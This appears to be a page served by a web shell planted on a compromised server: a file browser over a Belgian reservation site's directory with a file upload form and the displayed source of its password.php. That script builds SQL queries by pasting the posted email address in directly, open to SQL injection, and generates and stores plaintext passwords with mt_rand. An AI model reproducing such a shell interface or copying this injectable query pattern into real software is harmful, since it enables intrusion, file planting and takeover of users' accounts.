<!DOCTYPE HTML>
<HTML>
<HEAD>
<title></title>
<style>
body{
font-family: monospace;
font-weight: bold;
font-size: 18px;
background-color: #c5c5c5;
color: #000;
}
#content tr:hover{
background-color: #ccc;
}
#content .first{
background-color: #ccc;
}
#content .first:hover{
background-color: #ccc;
}
table{
border: 3px #000 solid;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #00f;
}
input,select,textarea{
border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : 216.73.216.162</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : <a href="?path=/">/</a><a href="?path=/home">home</a>/<a href="?path=/home/xbodynamge">xbodynamge</a>/<a href="?path=/home/xbodynamge/namtation">namtation</a>/<a href="?path=/home/xbodynamge/namtation/reservation">reservation</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr><tr><td style='padding: 8px'>Current File : /home/xbodynamge/namtation/reservation/password.php</tr></td></table><br /><pre>&lt;?php
include_once('./inc/init.inc.php');


function new_password($nb_car, $chaine = 'azertyupqsdfghjkmwxcvbn23456789')
{
    $nb_lettres = strlen($chaine) - 1;
    $generation = '';
    for($i=0; $i &lt; $nb_car; $i++)
    {
        $pos = mt_rand(0, $nb_lettres);
        $car = $chaine[$pos];
        $generation .= $car;
    }
    return $generation;
}



$sql = &quot;select count(*) as existe from reservation&quot;.$DB_prefixtable.&quot;client where email='&quot;.$_POST['email'].&quot;' and webaccess=1&quot;;
$req = mysqli_query($db, $sql) or die('Erreur SQL !'.mysqli_error()); 
$client = mysqli_fetch_assoc($req);

if ($client['existe']==0) {
  header('Location: index.php?error=2'); 
}
else{
  $npwd=new_password(6);
  $sql = &quot;update reservation&quot;.$DB_prefixtable.&quot;client set mdp='&quot;.$npwd.&quot;' where email='&quot;.$_POST['email'].&quot;'&quot;;
  $req = mysqli_query($db, $sql) or die('Erreur SQL !'.mysqli_error());  
  
  /*mail*/
  
   require('phpmailer/class.phpmailer.php');
   $mail = new PHPMailer();
   $mail-&gt;CharSet = &quot;utf-8&quot;;
   $mail-&gt;IsHTML(true);
   $mail-&gt;From = &quot;info@namtation.be&quot;;
   $mail-&gt;FromName = &quot;NamTation&quot;;
   $mail-&gt;Subject = &quot;Votre accès au module de réservation&quot;;
   
   $body=&quot;&quot;;
   $body=$body.&quot;Bonjour,&lt;br&gt;&lt;br&gt;&quot;;
   $body=$body.&quot;Vous trouverez ci-dessous les paramètres qui vont permettront d'acc&amp;eacute;der au système de r&amp;eacute;servation de vos s&amp;eacute;ances de Namtation :&lt;br&gt;&lt;br&gt;&quot;;
   $body=$body.'Adresse : &lt;a href=&quot;https://www.namtation.be/reservation&quot;&gt;https://www.namtation.be/reservation&lt;/a&gt;&lt;br&gt;';
   $body=$body.&quot;Adresse mail : &quot;.$_POST['email'].&quot;&lt;br&gt;&quot;;
   $body=$body.&quot;Mot de passe : &quot;.$npwd.&quot;&lt;br&gt;&lt;br&gt;&quot;;
   $body=$body.&quot;Vous pouvez à tout moment changer ce mot de passe en cliquant sur 'Mise à jour de vos données'.&lt;br&gt;&lt;br&gt;&quot;;
   $body=$body.&quot;NamTation&quot;;
     
   
   $mail-&gt;Body = $body;
   $mail-&gt;AddAddress($_POST['email']);
   $mail-&gt;send();
  
  /*liam*/
  header('Location: index.php?message=1'); 
  
}
 




mysql_close(); 
?&gt;</pre><center><hr width="920" color="black"/> <center>
</BODY>
</HTML>